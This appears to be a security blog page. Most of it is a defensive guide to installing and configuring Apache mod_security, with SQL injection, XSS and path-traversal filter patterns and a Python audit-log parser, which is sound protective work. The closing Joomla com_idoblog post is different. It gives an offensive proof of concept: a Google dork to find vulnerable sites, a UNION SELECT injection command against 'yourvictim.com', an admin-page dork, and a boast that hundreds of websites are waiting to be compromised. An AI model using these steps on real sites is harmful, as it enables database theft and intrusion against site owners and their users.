Solution for SQL injection, blind SQLi, XSS attacks, authentication bypass, brute-force attacks on the admin page, etc. = mod_security (Apache only)
Sorry, IIS admins.
How to install mod_security on Apache (Unix) and Apache (Windows)
Download Mod Security here
Installing Mod Security on Linux/CentOS
Steps for mod_security 2.5; installation of older versions may differ.
1. Download and unpack the source
$ wget http://www.modsecurity.org/download/modsecurity-apache_2.5.9.tar.gz
$ tar zxf modsecurity-apache_2.5.9.tar.gz
2. Compile with make (the 2.5 source builds from its apache2/ directory, so run configure there first)
$ cd modsecurity-apache_2.5.9/apache2
$ ./configure
$ make
3. Stop Apache
$ /sbin/service httpd stop
4. Install with make install
$ make install
5. Now open your httpd.conf file, typically located at /etc/httpd/conf/
$ vi /etc/httpd/conf/httpd.conf
6. Find the section that contains the LoadModule directives.
Above all of the LoadModule directives, paste this line:
Code:
LoadFile /usr/lib/libxml2.so
7. Then go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf
8. Now we need to get the configuration policies (the core rule set)
$ mkdir /etc/httpd/conf/modsecurity
$ cd /etc/httpd/conf/modsecurity
$ wget http://www.modsecurity.org/download/modsecurity-core-rules_2.5-1.6.1.tar.gz
$ tar zxf modsecurity-core-rules_2.5-1.6.1.tar.gz
$ rm -f modsecurity-core-rules_2.5-1.6.1.tar.gz
9. Edit the *.conf files to fit your machine's usage and expected rule sets
10. Restart Apache
If you have a software package manager (the yum tool), you can instead run
yum install mod_security
Mod Security Configuration
Edit httpd.conf and add the following lines. Note that the SecFilter* directives and the mod_security.c module name below are ModSecurity 1.x syntax; a 2.x build like the one compiled above (mod_security2.so) will not accept them and uses SecRuleEngine/SecRule instead, as in the modsecurity.conf-minimal and the core rules shown further down.
<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine On
# Change Server: string
SecServerSignature " "
# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On
# This setting should be set to On only if the Web site is
# using the Unicode encoding. Otherwise it may interfere with
# the normal Web site operation.
SecFilterCheckUnicodeEncoding Off
# Only allow bytes from this range
SecFilterForceByteRange 1 255
# The audit engine works independently and
# can be turned On or Off on the per-server or
# on the per-directory basis. "On" will log everything,
# "DynamicOrRelevant" will log dynamic requests or violations,
# and "RelevantOnly" will only log policy violations
SecAuditEngine RelevantOnly
# The name of the audit log file
SecAuditLog /var/log/httpd/audit_log
# Should mod_security inspect POST payloads
SecFilterScanPOST On
# Action to take by default
SecFilterDefaultAction "deny,log,status:500"
# Require HTTP_USER_AGENT and HTTP_HOST in all requests
SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"
# Prevent path traversal (..) attacks
SecFilter "../"
# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"
# Prevent XSS attacks (HTML/Javascript injection)
# (note: this rejects any request containing an HTML tag at all, including legitimate HTML posted by users)
SecFilter "<(.|\n)+>"
# Very crude filters to prevent SQL injection attacks
# (note: these will also match ordinary English such as "select an item from the list")
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
# Protecting from XSS attacks through the PHP session cookie
SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
</IfModule>
Alternative:
Include conf/modsecurity/*.conf
(*.conf = the mod security rule files)
Restart Apache
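The audit log configured above (SecAuditEngine RelevantOnly, SecAuditLog) is where blocked and logged-only hits end up. The following is an added Python example, not code from the original post, that parses the ModSecurity 2.x serial audit log layout (parts A, B, H, Z) into per-entry summaries and counts blocked requests per client IP, separating "Access denied" hits from "Warning" (pass) hits. The log text, rule ids and messages are constructed samples for the example.

```python
import re
from collections import Counter

# Constructed sample in the ModSecurity 2.x serial audit log layout (parts A, B, H, Z), not a real
# capture. Part A reads "[time] unique_id client_ip client_port server_ip server_port".
SAMPLE_AUDIT_LOG = """\
--7f3a9c1e-A--
[17/Aug/2009:10:23:45 +0000] SoksLX8AAQEAAB@LHGsAAAAA 192.0.2.10 51234 198.51.100.5 80
--7f3a9c1e-B--
GET /index.php?id=1+union+select+1,2+from+t HTTP/1.1
--7f3a9c1e-H--
Message: Access denied with code 500 (phase 2). Pattern match "select.+from" at ARGS:id. [file "/etc/httpd/conf/modsecurity/modsecurity_crs_40_generic_attacks.conf"] [line "30"] [id "950001"] [msg "SQL Injection Attack"] [severity "CRITICAL"]
Action: Intercepted (phase 2)
--7f3a9c1e-Z--
--7f3a9c1f-A--
[17/Aug/2009:10:24:02 +0000] SoksMn8AAQEAAB@LHGwAAAAA 203.0.113.7 40022 198.51.100.5 80
--7f3a9c1f-B--
GET /guestbook.php?name=%3Cscript%3E HTTP/1.1
--7f3a9c1f-H--
Message: Warning. Pattern match "<[[:space:]]*script" at ARGS:name. [id "950004"] [msg "Cross-site Scripting (XSS) Attack"]
--7f3a9c1f-Z--
"""

PART_RE = re.compile(r"^--([0-9a-f]+)-([A-Z])--$", re.M)   # "--<entry id>-<part letter>--"
PART_A_RE = re.compile(r"\] (\S+) (\S+) (\d+) (\S+) (\d+)")  # unique_id, client ip/port, server ip/port
TAG_RE = re.compile(r'\[(\w+) "([^"]*)"\]')                  # [file "..."] [id "..."] [msg "..."] tags

def parse_audit_log(text):
    """Group the log into {entry_id: {part_letter: part_body}}."""
    entries = {}
    marks = list(PART_RE.finditer(text))
    for mark, nxt in zip(marks, marks[1:] + [None]):
        body = text[mark.end():nxt.start() if nxt else len(text)]
        entries.setdefault(mark.group(1), {})[mark.group(2)] = body.strip("\n")
    return entries

def summarize(entry):
    """Fields an analyst triages first: client IP, request line, and each rule hit with its verdict."""
    a = PART_A_RE.search(entry.get("A", ""))
    request_line = entry.get("B", "").splitlines()[:1]
    alerts = [dict(TAG_RE.findall(line), denied=line.startswith("Message: Access denied"))
              for line in entry.get("H", "").splitlines() if line.startswith("Message:")]
    return {"client_ip": a.group(2) if a else None,
            "request": request_line[0] if request_line else "", "alerts": alerts}

def denied_by_client(text):
    """Count blocked requests per client IP; 'Warning' (pass) hits are logged but not counted."""
    return Counter(s["client_ip"] for s in map(summarize, parse_audit_log(text).values())
                   if any(al["denied"] for al in s["alerts"]))
```

Run it against /var/log/httpd/audit_log to see which rules fire in "pass" mode before switching them to deny, so false positives on legitimate traffic show up as warnings rather than blocked users.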
Mod Security rules for Unix can be downloaded here:
http://www.gotroot.com/mod_security+rules
Install Mod Security on Windows Apache:
1. Download mod_security2.so from http://www.apachelounge.com/ (a binary package)
2. Unzip the package; you will get mod_security2.so and a libxml2.dll
4. Create a folder /apache/modules/mod_security2 and copy mod_security2.so and libxml2.dll into it
5. Create a folder /apache/conf/modsecurity and copy the mod security rules (.conf files) there
6. Install the Visual C++ 2008 Redistributable Package here
7. In httpd.conf, go to the end of the LoadModule section and add
Code:
LoadModule security2_module modules/mod_security2/mod_security2.so
8. In httpd.conf, copy and paste modsecurity.conf-minimal:
# Basic configuration options
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off
# Handling of file uploads
# TODO Choose a folder private to Apache.
# SecUploadDir /opt/apache-frontend/tmp/
SecUploadKeepFiles Off
# Debug log
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 0
# Maximum request body size we will
# accept for buffering
SecRequestBodyLimit 131072
# Store up to 128 KB in memory
SecRequestBodyInMemoryLimit 131072
# Buffer response bodies of up to
# 512 KB in length
SecResponseBodyLimit 524288
9. You can use the Include directive to pull in the mod_security configuration files. Before activating the rules for your web server installation:
- edit and customize modsecurity_crs_10_config.conf.
- edit modsecurity_crs_40_generic_attacks.conf (it detects common web application attacks): change the value "pass" to "deny,status:500" in modsecurity_crs_40_generic_attacks.conf so those rules block instead of only logging.
Add the following line to your httpd.conf (assuming you've placed the rule files into conf/modsecurity/):
Include conf/modsecurity/*.conf
Mod Security requires mod_unique_id.
Uncomment mod_unique_id in httpd.conf
End. Your web server is now pretty safe, for now. 'pretty', heh.
You can test mod security by installing a vulnerable web application for hacking simulation, for example:
Mutillidae
or
Damn Vulnerable Web Application
17 August 2009
12 August 2009
Joomla com_idoblog SQL Injection Vulnerability (ALL VERSIONS)
Dear Mr. Admin,
Do you know that at least 5-10 Joomla component vulnerabilities are reported every day? Every day.
If you are using com_idoblog for your Joomla, please change to an alternative, more secure component.
I've tested this vulnerability and yes, it affects all versions of Joomla.
POC
1.google dork inurl:com_idoblog itemid=
2.inject ' at userid and you may receive an error message..here we go
3.use schemafuzzer/sqlmap instead of manual sql test. Manual sql thru browser will show only 3 column=false instead of 16=true.
4.schema fuzzer result =
$ python skemafuzzer.py -u "http://yourvictim.com/index.php?option=com_idoblog&task=profile&userid=63+AND+1=2+UNION+SELECT+darkc0de,
darkc0de,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15"
inurl:login.php or admin.php site:yourvictim.com
7.BOOOM!hundreds of websites waiting to be compromised